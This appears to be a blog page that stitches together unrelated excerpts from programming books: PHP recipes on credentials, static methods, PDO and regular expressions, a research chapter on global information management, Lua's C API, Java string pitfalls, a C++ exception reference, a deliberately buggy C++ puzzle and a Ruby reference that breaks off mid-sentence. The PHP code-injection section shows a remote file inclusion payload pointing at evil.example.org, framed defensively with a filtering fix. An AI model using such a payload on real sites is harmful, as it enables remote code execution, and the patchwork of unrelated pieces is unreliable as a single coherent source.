Monday, January 11, 2010

Recipe 18.6. Keeping Passwords Out of Your Site Files

18.6.1. Problem

You need to use a password, for example to connect to a database. You don't want to put the password in the PHP files you use on your site in case those files are exposed.

18.6.2. Solution

Store the password in an environment variable in a file that the web server loads when starting up. Then, just reference the environment variable in your code:

<?php

mysql_connect('localhost', $_SERVER['DB_USER'], $_SERVER['DB_PASSWORD']);

?>
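
The one-line call above assumes both variables are actually set. The following is a minimal sketch of a helper that fails fast with a clear error when one is missing, instead of attempting a connection with empty credentials. The helper name db_credentials() and the getenv() fallback are assumptions, not part of this recipe.

```php
<?php
// Hypothetical helper: read the credentials the web server set with SetEnv.
// Under Apache's mod_php they appear in $_SERVER; getenv() is an assumed
// fallback for environments (such as the CLI) that expose them only there.
function db_credentials()
{
    $credentials = array();
    foreach (array('DB_USER', 'DB_PASSWORD') as $name) {
        $value = isset($_SERVER[$name]) ? $_SERVER[$name] : getenv($name);
        if ($value === false || $value === '') {
            // Report which variable is missing, but never print a value.
            throw new RuntimeException("Environment variable $name is not set");
        }
        $credentials[$name] = $value;
    }
    return $credentials;
}
```

You would then pass $credentials['DB_USER'] and $credentials['DB_PASSWORD'] to your connect call. The exception message deliberately names the variable but never echoes a password.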

18.6.3. Discussion

While this technique removes passwords from the source code of your pages, it makes them available in other places that need to be protected. Most importantly, make sure that there are no publicly viewable pages that call phpinfo( ). Because phpinfo( ) displays all of the environment variables, it exposes any passwords you store there. Also, make sure not to expose the contents of $_SERVER in other ways, such as with the print_r( ) function.

Next, especially if you are using a shared host, make sure the environment variables are set in such a way that they are only available to your virtual host, not to all users. With Apache, you can do this by setting the variables in a separate file from the main configuration file:

SetEnv  DB_USER     "susannah"
SetEnv  DB_PASSWORD "y23a!t@ce8"

Inside the <VirtualHost> directive for the site in the main configuration file (httpd.conf), include this separate file as follows:

Include "/usr/local/apache/database-passwords"

Make sure that this separate file containing the password (e.g., /usr/local/apache/database-passwords) is not readable by any user other than the one that controls the appropriate virtual host. When Apache starts up and is reading in configuration files, it's usually running as root, so it is able to read the included file. A child process that handles requests typically runs as an unprivileged user, so rogue scripts cannot read the protected file.

18.6.4. See Also

Documentation on Apache's Include directive at http://httpd.apache.org/docs/mod/core.html#include.

GIM Research Frameworks

No formal definition of global information management could be found in the IS literature. Deans and Ricks (1991) refer to issues at the "interface of MIS and international business" (p. 58). Palvia (1997) refers to "global IT research" and describes a model to "assess the strategic impact of IT on a global organization engaged in international business" (p. 230). For this chapter, we define global information management as the development, use, and management of information systems in a global/international context. By global we mean those information systems that have impacts beyond a single country or country of origin. The term global is used in a general sense since no firm or information system is found in every country in the world. Global information management deals with management, technological, and cultural issues such as differing national communications infrastructures, differing IS quality standards, IS development in different cultures, and many others. GIM research is the rigorous and systematic study of the development, use, and operations/management of a global information system(s) in a multicountry organizational environment. At the same time, traditional GIM research includes numerous single-country studies focusing on the management of the information resource in a domestic context. According to Palvia (1998a), these "first generation" studies have laid the foundation and helped define global IT. This chapter therefore includes single-country studies in the analysis.

Most of the published literature in GIM that provides some kind of guide to research in the field has concentrated on identifying the "key issues" in the global management of information resources (Badri, 1992; Deans & Ricks, 1991; Ives & Jarvenpaa, 1991; Palvia, 1998b; Watson et al., 1997). These publications survey various stakeholders involved in the research and practice of GIM and are useful in that they attempt to capture what these people think are the critical issues in the field.

Very few papers propose frameworks or models that will help guide comprehensive research in this area. One exception is the work of Deans and Ricks (1991), who identify key issues and develop a research model based on Nolan and Wetherbe's (1981) IS research model and Skinner's (1964) work on international dimensions. This model views research as a set of subsystems that places management information systems (or GIM) at the center of the set. Skinner's international dimensions (social/cultural, economic, technological, political/legal) are overlaid on this framework to show the scope of the issues involved in GIM. This model is useful in a general sense but does not appear to help in showing where previous research fits or in guiding future research.

Another exception is Palvia (1997). In this paper, a model that attempts to measure the strategic impact of IT on the global firm is proposed. This model is useful in that it identifies a number of strategic factors that should be considered in studying global IT. However, this model does not identify key areas for future research in GIM and was not developed specifically to guide comprehensive research in the field.

Other preliminary frameworks with a focus on culture might also be considered GIM research frameworks. Ein-Dor, Segev, and Orgad (1993), in their model, contend that culture as a variable consists of three major dimensions—economic, demographic, and psycho-sociological. The authors argue that any research into global IT should consider these cultural dimensions. Nelson and Clark (1994) propose a model describing the effect of multicultural environments on IT development and use. However, both of these models are too narrow in their scope and do not provide a broad framework to guide research in GIM.

What appears to be missing at this point is an overall research model, similar to the early IS research models, which will help guide future research into GIM and help organize and categorize research previously done. According to Palvia (1998a), such a framework has yet to be developed.

Recipe 7.17. Defining Static Properties and Methods

7.17.1. Problem

You want to define methods in an object and be able to access them without instantiating an object.

7.17.2. Solution

Declare the method as static:

class Format {
    public static function number($number, $decimals = 2,
                                  $decimal = '.', $thousands = ',') {
        return number_format($number, $decimals, $decimal, $thousands);
    }
}

print Format::number(1234.567);
1,234.57

7.17.3. Discussion

Occasionally, you want to define a collection of methods in an object, but you want to be able to invoke those methods without instantiating an object. In PHP 5, declaring a method static lets you call it directly:

class Format {
    public static function number($number, $decimals = 2,
                                  $decimal = '.', $thousands = ',') {
        return number_format($number, $decimals, $decimal, $thousands);
    }
}

print Format::number(1234.567);
1,234.57

Since static methods don't require an object instance, use the class name instead of the object. Don't place a dollar sign ($) before the class name.

Static methods aren't referenced with an arrow (->) but with double colons (::); this signals to PHP that the method is static. So in the example, the number( ) method of the Format class is accessed using Format::number( ).

Number formatting doesn't depend on any other object properties or methods. Therefore, it makes sense to declare this method static. This way, for example, inside your shopping cart application, you can format the price of items in a pretty manner with just one line of code and still use an object instead of a global function.

Static methods do not operate on a specific instance of the class where they're defined. PHP does not "construct" a temporary object for you to use while you're inside the method. Therefore, you cannot refer to $this inside a static method, because there's no $this on which to operate. Calling a static method is just like calling a regular function.
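
Because a static method needs no object, PHP can treat it much like a plain function. In this sketch (the Price class is hypothetical), the method is passed to array_map() as a callable made of the class name and the method name. It relies only on its arguments and never touches $this:

```php
<?php
// Hypothetical class used only to illustrate a static method as a callable.
class Price {
    public static function format($amount) {
        // No $this here: the result depends only on the argument.
        return '$' . number_format($amount, 2);
    }
}

// array('Price', 'format') is a callable that names a static method.
$prices = array_map(array('Price', 'format'), array(3.5, 1234.567));
print implode(', ', $prices) . "\n";
```

This prints $3.50, $1,234.57, exactly as if format() were a global function named Price::format.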

PHP 5 also has a feature known as static properties. Every instance of a class shares these properties in common. Thus, static properties act as class-namespaced global variables.

One reason for using a static property is to share a database connection among multiple Database objects. For efficiency, you shouldn't create a new connection to your database every time you instantiate Database. Instead, negotiate a connection the first time and reuse that connection in each additional instance, as shown in Example 7-37.

Example 7-37. Sharing a static property across instances

class Database {
    private static $dbh = NULL;

    public function __construct($server, $username, $password) {
        if (self::$dbh == NULL) {
            self::$dbh = db_connect($server, $username, $password);
        } else {
            // reuse existing connection
        }
    }
}

$db  = new Database('db.example.com', 'web', 'jsd6w@2d');
// Do a bunch of queries

$db2 = new Database('db.example.com', 'web', 'jsd6w@2d');
// Do some additional queries

Static properties, like static methods, use the double colon notation. To refer to a static property inside of a class, use the special prefix of self. self is to static properties and methods as $this is to instantiated properties and methods.

The constructor uses self::$dbh to access the static connection property. When $db is instantiated, self::$dbh is still NULL, so the constructor calls db_connect( ) to negotiate a new connection with the database.

This does not occur when you create $db2, since dbh has been set to the database handle.
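
Because db_connect( ) is only a placeholder, Example 7-37 can't run exactly as printed. Below is a minimal runnable sketch of the same static-property pattern. It assumes a hypothetical connect() stub that returns a dummy handle and counts how many times it is called, so you can see that only one connection is opened:

```php
<?php
class Database {
    // One handle shared by every Database instance.
    private static $dbh = NULL;

    // Number of connections actually opened (for demonstration only).
    public static $connections = 0;

    public function __construct($server, $username, $password) {
        if (self::$dbh === NULL) {
            self::$dbh = self::connect($server, $username, $password);
        }
        // Otherwise, reuse the existing connection in self::$dbh.
    }

    public function handle() {
        return self::$dbh;
    }

    // Hypothetical stand-in for a real connect call such as new PDO(...).
    private static function connect($server, $username, $password) {
        self::$connections++;
        $handle = new stdClass();
        $handle->server = $server;
        return $handle;
    }
}

$db  = new Database('db.example.com', 'web', 'secret');
$db2 = new Database('db.example.com', 'web', 'secret');
print Database::$connections . "\n";   // 1
```

Both objects return the identical handle from handle(), because the property lives on the class rather than on each instance.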

7.17.4. See Also

Documentation on the static keyword at http://www.php.net/manual/en/language.oop5.static.php.

The Stack

	Programming in Lua
	Part IV. The C API Chapter 24. An Overview of the C API

24.2 - The Stack

We face two problems when trying to exchange values between Lua and C:
the mismatch between a dynamic and a static type system
and the mismatch between
automatic and manual memory management.

In Lua, when we write a[k] = v,
both k and v can have several different types
(even a may have different types,
due to metatables).
If we want to offer this operation in C, however,
any settable function must have a fixed type.
We would need dozens of different functions for this single operation
(one function for each combination of types for the three arguments).

We could solve this problem by declaring some kind of union type in C,
let us call it lua_Value,
that could represent all Lua values.
Then, we could declare settable as


    void lua_settable (lua_Value a, lua_Value k, lua_Value v);

This solution has two drawbacks.
First, it can be difficult to map
such a complex type to other languages;
Lua has been designed to
interface easily not only with C/C++,
but also with Java, Fortran, and the like.
Second, Lua does garbage collection:
If we keep a Lua value in a C variable,
the Lua engine has no way to know about this use;
it may (wrongly) assume that this value is garbage
and collect it.

Therefore, the Lua API does not define
anything like a lua_Value type.
Instead, it uses an abstract stack to exchange values between Lua and C.
Each slot in this stack can hold any Lua value.
Whenever you want to ask for a value from Lua
(such as the value of a global variable),
you call Lua, which pushes the required value on the stack.
Whenever you want to pass a value to Lua,
you first push the value on the stack,
and then you call Lua (which will pop the value).
We still need a different function to push each C type on the stack
and a different function to get each value from the stack,
but we avoid the combinatorial explosion.
Moreover, because this stack is managed by Lua,
the garbage collector knows which values C is using.

Nearly all functions in the API use the stack.
As we saw in our first example,
luaL_loadbuffer leaves its result on the stack
(either the compiled chunk or an error message);
lua_pcall gets the function to be called from the stack
and leaves any occasional error message there.

Lua manipulates this stack in a strict LIFO discipline
(Last In, First Out; that is, always through the top).
When you call Lua, it only changes the top part of the stack.
Your C code has more freedom;
specifically, it can inspect any element inside the stack
and even insert and delete elements in any arbitrary position.

Section 5.4.  Code Injection

An extremely dangerous situation exists when you use tainted data as the leading part of a dynamic include:


    <?php

    include "{$_GET['path']}/header.inc";

    ?>

Rather than being able to manipulate only the filename, this situation allows an attacker to manipulate the nature of the resource to be included. Due to a feature of PHP that is enabled by default (and controlled by the allow_url_fopen directive), resources other than files can be included (since PHP 5.2, including a remote URL also requires the allow_url_include directive, which is disabled by default):


    <?php

    include 'http://www.google.com/';

    ?>

The behavior of this use of include is that the source of http://www.google.com is included as though it were a local file. While this particular example is harmless, imagine if the source returned by Google contained PHP code. The PHP code would be interpreted and executed, which is exactly the opportunity an attacker can take advantage of to deliver a serious blow to your security.

Imagine a value of path that indicates a resource under the attacker's control:


    http://example.org/index.php?path=http%3A%2F%2Fevil.example.org%2Fevil.inc%3F

In this example, path is the URL encoded value of the following:


    http://evil.example.org/evil.inc?

This causes the include statement to include and execute code of the attacker's choosing (evil.inc), and the filename is treated as the query string:


    <?php

    include "http://evil.example.org/evil.inc?/header.inc";

    ?>

This eliminates the need for an attacker to guess the remaining pathname and filename (/header.inc) and reproduce this at evil.example.org. Instead, all she must do is make the evil.inc script output valid PHP code to be executed by the victim's web server; the script can ignore the query string.

This is just as dangerous as allowing an attacker to edit your PHP scripts directly. Luckily, it is easily defeated: use only filtered data in your include and require statements:


    <?php

    $clean = array();

    /* $_GET['path'] is filtered and stored in $clean['path']. */

    include "{$clean['path']}/header.inc";

    ?>
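
The comment above leaves the filtering step open. One common approach is a strict whitelist, so that a value such as http://evil.example.org/evil.inc? can never pass. This sketch assumes only a few known directory names are valid; the list in $allowed and the helper name filter_include_path() are hypothetical:

```php
<?php
// Hypothetical whitelist filter for the include path.
function filter_include_path($path)
{
    // Replace with the directory names your site actually uses.
    $allowed = array('en', 'fr', 'de');
    // Strict comparison: only an exact, known string is accepted.
    return in_array($path, $allowed, true) ? $path : null;
}

$clean = array();
$path = filter_include_path(isset($_GET['path']) ? $_GET['path'] : '');
if ($path !== null) {
    $clean['path'] = $path;
}
```

The include statement shown above should run only when $clean['path'] is set. Anything else, including URLs and ../ sequences, is simply rejected.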

10. Strings

This section concerns character strings.

10.1. Arrays do not override `Object.toString`

Prescription: For char arrays, use String.valueOf to obtain the string representing the designated sequence of characters. For other types of arrays, use Arrays.toString or, prior to release 5.0, Arrays.asList.

References: Puzzle 12; [JLS 10.7].

10.2. `String.replaceAll` takes a regular expression as its first argument

Prescription: Ensure that the argument is a legal regular expression, or use String.replace instead.

References: Puzzle 20.

10.3. `String.replaceAll` takes a replacement string as its second argument

Prescription: Ensure that the argument is a legal replacement string, or use String.replace instead.

References: Puzzle 20.

10.4. Repeated string concatenation can cause poor performance

Prescription: Avoid using the string concatenation operator in loops.

References: [EJ item 33].

10.5. Conversion of bytes to characters requires a charset

Prescription: Always select a charset when converting a byte array to a string or char array; if you don't, the platform default charset will be used, leading to unpredictable behavior.

References: Puzzle 18.

10.6. Values of type `char` are silently converted to `int`, not `String`

Prescription: To convert a char to a string, use String.valueOf(char).

References: Puzzles 11 and 23; [JLS 5.1.2].

The underflow_error Class


Class Name            underflow_error

Header File           <stdexcept>

Classification      Exception

Class Relationship Diagram

Class Description

Member Classes

None

Methods



underflow_error(const string &What_Arg)

Example

Class Description

The underflow_error class is derived from the runtime_error class.
The underflow_error class represents exceptions that occur because of
an arithmetic underflow error.



Method            underflow_error()

Access            Public

Classification    Constructor

Syntax            underflow_error(const string &What_Arg)      

Parameters        The What_Arg parameter should contain a description of the kind of exception
                  that has occurred.

Return            None

Description

The underflow_error() method constructs an object of type underflow_error. The What_Arg parameter
can be used to set a description of the kind of error that this exception represents.
A set of possible solutions is sometimes supplied with the exception description in addition
to the type of error.

Figure: The Class Relationship Diagram of underflow_error

Example

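    #include <iostream>
    #include <stdexcept>

    int main()
    {
        try
        {
            // A plain std::exception; its what() text is implementation-defined.
            std::exception X;
            throw X;
        }
        catch (const std::exception &X)
        {
            std::cout << X.what() << std::endl;
        }

        try
        {
            // underflow_error keeps the message passed to its constructor.
            std::underflow_error UnderFlow("Arithmetic Operation Underflow");
            throw UnderFlow;
        }
        catch (const std::exception &X)
        {
            // Caught through the base class; prints "Arithmetic Operation Underflow".
            std::cout << X.what() << std::endl;
        }

        return 0;
    }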

We Want to Hear from You!

As the reader of this book, you are our most important critic and commentator. We value your opinion and want to know what we're doing right, what we could do better, what areas you'd like to see us publish in, and any other words of wisdom you're willing to pass our way.

As an associate publisher for Sams Publishing, I welcome your comments. You can email or write me directly to let me know what you did or didn't like about this book, as well as what we can do to make our books better.

Please note that I cannot help you with technical problems related to the topic of this book. We do have a User Services group, however, where I will forward specific technical questions related to the book.

When you write, please be sure to include this book's title and author as well as your name, email address, and phone number. I will carefully review your comments and share them with the author and editors who worked on the book.

Email:

feedback@samspublishing.com

Mail:

Michael Stephens
Associate Publisher
Sams Publishing
800 East 96th Street
Indianapolis, IN 46240 USA

For more information about this book or another Sams Publishing title, visit our Web site at www.samspublishing.com. Type the ISBN (excluding hyphens) or the title of a book in the Search field to find the page you're looking for.

Program 86: Lack of Self-Awareness

The following program is designed to test out our simple array. Yet there's a problem that causes the program to fail in an unexpected way.


  1 /************************************************
  2  * array_test -- Test the use of the array class*
  3  ************************************************/
  4 #include <iostream>
  5
  6 /************************************************
  7  * array -- Classic variable length array class.*
  8  *                                              *
  9  * Member functions:                            *
 10  *      operator [] -- Return an item           *
 11  *              in the array.                   *
 12  ************************************************/
 13 class array {
 14     protected:
 15         // Size of the array
 16         int size;
 17
 18         // The array data itself
 19         int *data;
 20     public:
 21         // Constructor.
 22         // Set the size of the array
 23         // and create data
 24         array(const int i_size):
 25             size(i_size),
 26             data(new int[size])
 27         {
 28             // Clear the data
 29             memset(data, '\0',
 30                     size * sizeof(data[0]));
 31         }
 32         // Destructor -- Return data to the heap
 33         virtual ~array(void)
 34         {
 35             delete []data;
 36             data = NULL;
 37         }
 38         // Copy constructor.
 39         // Delete the old data and copy
 40         array(const array &old_array)
 41         {
 42             delete []data;
 43             data = new int[old_array.size];
 44
 45             memcpy(data, old_array.data,
 46                     size * sizeof(data[0]));
 47         }
 48         // operator =.
 49         // Delete the old data and copy
 50         array & operator = (
 51                 const array &old_array)
 52         {
 53             delete []data;
 54             data = new int[old_array.size];
 55
 56             memcpy(data, old_array.data,
 57                     size * sizeof(data[0]));
 58             return (*this);
 59         }
 60     public:
 61         // Get a reference to an item in the array
 62         int &operator [](const unsigned int item)
 63         {
 64             return data[item];
 65         }
 66 };
 67
 68 /**********************************************
 69  * three_more_elements  --                    *
 70  *      Copy from_array to to_array and       *
 71  *      put on three more elements.           *
 72  **********************************************/
 73 void three_more_elements(
 74     // Original array
 75     array to_array,
 76
 77     // New array with modifications
 78     const array &from_array
 79 )
 80 {
 81     to_array = from_array;
 82     to_array[10] = 1;
 83     to_array[11] = 3;
 84     to_array[11] = 5;
 85 }
 86 int main()
 87 {
 88     array an_array(30);  // Simple test array
 89
 90     an_array[2] = 2;    // Put in an element
 91     // Put on a few more
 92     three_more_elements(an_array, an_array);
 93     return(0);
 94 }

(Next Hint 8. Answer 75.)

A programmer at IBM's Yorktown Heights Research Center had a problem. When he was sitting down, everything went fine. When he stood up, the computer failed. Now this problem was interesting in that it was completely repeatable. When he stood up, the machine always failed, and when he sat down it always worked. Nothing flaky about this problem.

The people in the computer office were baffled. After all, how could the computer know when the guy was standing or sitting? All sorts of theories were floated, such as static electricity, magnetic fields, and even acts of a playful God.

The most likely theory was that there was something loose under the carpet. It was a nice theory, but unfortunately it didn't fit the facts. Loose wires tend to cause intermittent problems, but this was 100 percent reproducible.

Finally, a sharp-eyed engineer noticed something. When the programmer sat down, he touch-typed. When he stood up, he used the hunt-and-peck method. A careful examination of the keyboard revealed that two of the keys had been reversed. This didn't matter when the fellow sat down and touch-typed. But when he rose and used the hunt-and-peck method, he was misled by the reversed keys and input the wrong data.

When the key caps were switched, the problem went away.

Recipe 10.3. Connecting to an SQL Database

10.3.1. Problem

You want access to an SQL database to store or retrieve information. Without a database, dynamic web sites aren't very dynamic.

10.3.2. Solution

Create a new PDO object with the appropriate connection string. Example 10-8 shows PDO object creation for a few different kinds of databases.

Example 10-8. Connecting with PDO

<?php
// MySQL expects parameters in the string
$mysql = new PDO('mysql:host=db.example.com', $user, $password);
// Separate multiple parameters with ;
$mysql = new PDO('mysql:host=db.example.com;port=31075', $user, $password);
$mysql = new PDO('mysql:host=db.example.com;port=31075;dbname=food', $user, $password);
// Connect to a local MySQL Server
$mysql = new PDO('mysql:unix_socket=/tmp/mysql.sock', $user, $password);

// PostgreSQL also expects parameters in the string
$pgsql = new PDO('pgsql:host=db.example.com', $user, $password);
// But you separate multiple parameters with ' '
$pgsql = new PDO('pgsql:host=db.example.com port=31075', $user, $password);
$pgsql = new PDO('pgsql:host=db.example.com port=31075 dbname=food', $user, $password);
// You can put the user and password in the DSN if you like.
$pgsql = new PDO("pgsql:host=db.example.com port=31075 dbname=food user=$user password=$password");

// Oracle
// If a database name is defined in tnsnames.ora, just put that in the DSN
$oci = new PDO('oci:dbname=food', $user, $password);
// Otherwise, specify an Instant Client URI
$oci = new PDO('oci:dbname=//db.example.com:1521/food', $user, $password);

// Sybase (If PDO is using FreeTDS)
$sybase = new PDO('sybase:host=db.example.com;dbname=food', $user, $password);
// Microsoft SQL Server (If PDO is using MS SQL Server libraries)
$mssql = new PDO('mssql:host=db.example.com;dbname=food', $user, $password);
// DBLib (for other versions of DB-lib)
$dblib = new PDO('dblib:host=db.example.com;dbname=food', $user, $password);

// ODBC -- a predefined connection
$odbc = new PDO('odbc:DSN=food');
// ODBC -- an ad-hoc connection. Provide whatever the underlying driver needs
$odbc = new PDO('odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:\\data\\food.mdb;Uid=Chef');

// SQLite just expects a filename -- no user or password
$sqlite = new PDO('sqlite:/usr/local/zodiac.db');
$sqlite = new PDO('sqlite:c:/data/zodiac.db');
// SQLite can also handle in-memory, temporary databases
$sqlite = new PDO('sqlite::memory:');
// SQLite v2 DSNs look similar to v3
$sqlite2 = new PDO('sqlite2:/usr/local/old-zodiac.db');
?>

10.3.3. Discussion

If all goes well, the PDO constructor returns a new object that can be used for querying the database. If there's a problem, a PDOException is thrown.
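
It is worth catching that PDOException yourself. The PHP manual warns that if an exception from the PDO constructor goes uncaught, the default back trace can reveal the full connection details, including the username and password. The following is a minimal sketch; connect_or_null() is a hypothetical helper name:

```php
<?php
// Hypothetical helper: return a PDO handle, or null if the connection fails.
function connect_or_null($dsn, $user = null, $password = null)
{
    try {
        $dbh = new PDO($dsn, $user, $password);
        // Make later query errors throw PDOException as well.
        $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        return $dbh;
    } catch (PDOException $e) {
        // Log the message server-side instead of showing a trace to the user.
        error_log('Database connection failed: ' . $e->getMessage());
        return null;
    }
}
```

A caller then checks for null and shows a generic error page. Whether to return null or rethrow a sanitized exception is a design choice; returning null simply keeps the sketch short.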

As you can see from Example 10-8, the format of the DSN is highly dependent on which kind of database you're attempting to connect to. In general, though, the first argument to the PDO constructor is a string that describes the location and name of the database you want and the second and third arguments are the username and password to connect to the database with. Note that to use a particular PDO backend, PHP must be built with support for that backend. Use the output from phpinfo( ) to determine what PDO backends your PHP setup has.
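
Instead of reading phpinfo( ) output (which, as noted in Recipe 18.6, should never be on a public page), you can ask PDO directly. The static method PDO::getAvailableDrivers() returns the names of the installed drivers, which correspond to the DSN prefixes shown above. This sketch lists them and checks for mysql as an example:

```php
<?php
// List the PDO backends compiled into this PHP build.
$drivers = PDO::getAvailableDrivers();
print 'PDO drivers: ' . implode(', ', $drivers) . "\n";

// Example check before using a mysql: DSN.
if (!in_array('mysql', $drivers, true)) {
    print "This PHP build cannot use 'mysql:' DSNs.\n";
}
```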

10.3.4. See Also

Recipe 10.4 for querying an SQL database; Recipe 10.6 for modifying an SQL database; documentation on PDO at http://www.php.net/PDO.

Recipe 1.12. Generating Fixed-Width Field Data Records

1.12.1. Problem

You need to format data records such that each field takes up a set number of characters.

1.12.2. Solution

Use pack( ) with a format string that specifies a sequence of space-padded strings. Example 1-32 transforms an array of data into fixed-width records.

Example 1-32. Generating fixed-width field data records

<?php

$books = array( array('Elmer Gantry', 'Sinclair Lewis', 1927),
                array('The Scarlatti Inheritance','Robert Ludlum',1971),
                array('The Parsifal Mosaic','William Styron',1979) );

foreach ($books as $book) {
    print pack('A25A15A4', $book[0], $book[1], $book[2]) . "\n";
}

?>

1.12.3. Discussion

The format string A25A15A4 tells pack( ) to transform its subsequent arguments into a 25-character space-padded string, a 15-character space-padded string, and a 4-character space-padded string. Values longer than their field are truncated to fit. For space-padded fields in fixed-width records, pack( ) provides a concise solution.
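
Because the field widths matter both when writing records and when reading them back, it can help to define them in one place and build the format string from them. Here is a minimal sketch, assuming a hypothetical $widths array describing the three fields of Example 1-32:

```php
<?php
// Hypothetical layout: widths of the title, author, and year fields.
$widths = array(25, 15, 4);

// Build "A25A15A4": 'A' means a space-padded string of that many bytes.
$format = '';
foreach ($widths as $width) {
    $format .= 'A' . $width;
}

$record = pack($format, 'Elmer Gantry', 'Sinclair Lewis', 1927);
print "[$record]\n";
```

The resulting record is always 44 characters long (25 + 15 + 4). Changing a width in $widths changes the format string automatically.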

To pad fields with something other than a space, however, use substr( ) to ensure that the field values aren't too long and str_pad( ) to ensure that they aren't too short. Example 1-33 transforms an array of records into fixed-width records whose fields are padded with periods (.).

Example 1-33. Generating fixed-width field data records without pack( )

<?php

$books = array( array('Elmer Gantry', 'Sinclair Lewis', 1927),
                array('The Scarlatti Inheritance','Robert Ludlum',1971),
                array('The Parsifal Mosaic','William Styron',1979) );

foreach ($books as $book) {
    $title  = str_pad(substr($book[0], 0, 25), 25, '.');
    $author = str_pad(substr($book[1], 0, 15), 15, '.');
    $year   = str_pad(substr($book[2], 0, 4), 4, '.');
    print "$title$author$year\n";
}

?>

1.12.4. See Also

Documentation on pack( ) at http://www.php.net/pack and on str_pad( ) at http://www.php.net/str_pad. Recipe 1.16 discusses pack( ) format strings in more detail.

Recipe 21.5. Avoiding Regular Expressions

21.5.1. Problem

You want to improve script performance by optimizing string-matching operations.

21.5.2. Solution

Replace unnecessary regular expression calls with faster string and character type function alternatives.

21.5.3. Discussion

A common source of unnecessary computation is the use of regular expression functions when they are not needed: for example, when you're validating a form submission and want to make sure that a username contains only alphanumeric characters.

A common approach to this problem is a regular expression:

<?php
if (!preg_match('/^[a-z0-9]+$/i', $username)) {
  echo 'please enter a valid username.';
}
?>

The same test can be performed much faster with the ctype_alnum( )
function.

Using code-timing techniques covered in Recipe 21.1, let's compare the above test with ctype_alnum( ):

<?php
$username = 'foo411';

$start = microtime(true);

if (!preg_match('/^[a-z0-9]+$/i', $username)) {
    echo 'please enter a valid username';
}

$regextime = microtime(true) - $start;

$start = microtime(true);

if (!ctype_alnum($username)) {
    echo 'please enter a valid username';
}

$ctypetime = microtime(true) - $start;

echo "preg_match took:  $regextime seconds\n";
echo "ctype_alnum took: $ctypetime seconds\n";
?>

This will output results similar to:

preg_match took:  0.000163078308105 seconds
ctype_alnum took: 9.05990600586E-06 seconds

ctype_alnum( ) is considerably faster; 9.05990600586E-06 is the same as 0.00000906 seconds, which is 18 times faster than the preg_match( ) regular expression, with exactly the same result.
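
To check the claim that both tests give the same result, you can run them side by side on a few inputs. This sketch uses made-up sample usernames, including the empty string. The regex uses + rather than * so that, like ctype_alnum( ), it rejects an empty string:

```php
<?php
// Made-up sample inputs, including edge cases.
$samples = array('foo411', 'Foo411', '', 'foo 411', 'foo_411', 'bar!');
$mismatches = array();

foreach ($samples as $username) {
    $viaRegex = preg_match('/^[a-z0-9]+$/i', $username) === 1;
    $viaCtype = ctype_alnum($username);
    if ($viaRegex !== $viaCtype) {
        $mismatches[] = $username;   // the two checks disagree here
    }
}

print count($mismatches) === 0 ? "Both checks agree\n" : "Mismatch found\n";
```

One caveat is that ctype_alnum( ) honors the current locale (as set with setlocale()), while the regex character class lists only ASCII letters and digits. Under some locales the two can therefore disagree on non-ASCII bytes.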

When applied to a complex application, replacing unnecessary regular expressions with equivalent alternatives can add up to a significant performance gain.

A good litmus test when you're coding and need to decide whether or not you need to use a regular expression is whether or not the match you're performing can be explained in a brief sentence. Granted, there are some matches, such as "string is a valid email address," which cannot be adequately verified without a complex regular expression. However, "check if string A contains string B" can be tested with several different approaches, but is ultimately a very simple test that does not require regular expressions:

<?php
$haystack = 'The quick brown fox jumps over the lazy dog';
$needle = 'lazy dog';

// slowest (ereg() was deprecated in PHP 5.3 and removed in PHP 7.0)
// if (ereg($needle, $haystack)) echo 'match!';

// slow (preg_quote() escapes any regex metacharacters in $needle)
if (preg_match('/' . preg_quote($needle, '/') . '/', $haystack)) echo 'match!';

// fast
if (strstr($haystack, $needle)) echo 'match!';

// fastest
if (strpos($haystack, $needle) !== false) echo 'match!';
?>
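
The !== false comparison in the last test matters. strpos( ) returns 0 when the needle is at the very start of the haystack, and 0 is falsy. The following is a minimal sketch that wraps the test in a hypothetical helper named contains(). On PHP 8.0 and later, the built-in str_contains() does the same job, so the helper uses it when available:

```php
<?php
// Hypothetical helper: substring test without regular expressions.
function contains($haystack, $needle)
{
    if (function_exists('str_contains')) {
        return str_contains($haystack, $needle);   // PHP 8.0+
    }
    // strpos() returns 0 for a match at position 0, so compare strictly.
    return strpos($haystack, $needle) !== false;
}

$haystack = 'The quick brown fox jumps over the lazy dog';
if (contains($haystack, 'The')) echo "match at the start!\n";
```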

There is certainly a benefit to double-checking the ctype and string functions before committing to a regular expression, particularly if you're working on a section of code that will loop repeatedly.

21.5.4. See Also

Documentation on ctype functions at http://www.php.net/manual/en/ref.ctype.php; on string functions at http://www.php.net/manual/en/ref.strings.php; on regular expression functions at http://www.php.net/manual/en/ref.pcre.php.

Section 10.2. The Top-Level Environment

When the Ruby interpreter starts, a number of classes, modules,
constants, global variables, and global functions are defined and
made available to programs. The subsections that follow list these
predefined features.

10.2.1. Predefined Modules and Classes

When the Ruby 1.8 interpreter starts, the following modules are
defined:

Comparable      FileTest        Marshal         Precision
Enumerable      GC              Math            Process
Errno           Kernel          ObjectSpace     Signal

These classes are defined on startup:

Array           File            Method          String
Bignum          Fixnum          Module          Struct
Binding         Float           NilClass        Symbol
Class           Hash            Numeric         Thread
Continuation    IO              Object          ThreadGroup
Data            Integer         Proc            Time
Dir             MatchData       Range           TrueClass
FalseClass      MatchingData    Regexp          UnboundMethod

The following exception classes are also defined:

ArgumentError           NameError               SignalException
EOFError                NoMemoryError           StandardError
Exception               NoMethodError           SyntaxError
FloatDomainError        NotImplementedError     SystemCallError
IOError                 RangeError              SystemExit
IndexError              RegexpError             SystemStackError
Interrupt               RuntimeError            ThreadError
LoadError               ScriptError             TypeError
LocalJumpError          SecurityError           ZeroDivisionError

Ruby 1.9 adds the following modules, classes, and
exceptions:

BasicObject     FiberError      Mutex           VM
Fiber           KeyError        StopIteration

You can check the predefined modules, classes, and exceptions in
your implementation with code like this:

# Print all modules (excluding classes)
puts Module.constants.sort.select {|x| eval(x.to_s).instance_of? Module}

# Print all classes (excluding exceptions)
puts Module.constants.sort.select {|x|
  c = eval(x.to_s)
  c.is_a? Class and not c.ancestors.include? Exception
}

# Print all exceptions
puts Module.constants.sort.select {|x|
  c = eval(x.to_s)
  c.instance_of? Class and c.ancestors.include? Exception
}

10.2.2. Top-Level Constants

When the Ruby interpreter starts, the following top-level
constants are defined (in addition
to the modules and classes listed previously). A module that defines a
constant by the same name can still access these top-level constants by
explicitly prefixing them with ::. You can list the
top-level constants in your implementation with:

ruby -e 'puts Module.constants.sort.reject{|x| eval(x.to_s).is_a? Module}'

ARGF: An IO-like object providing access to a
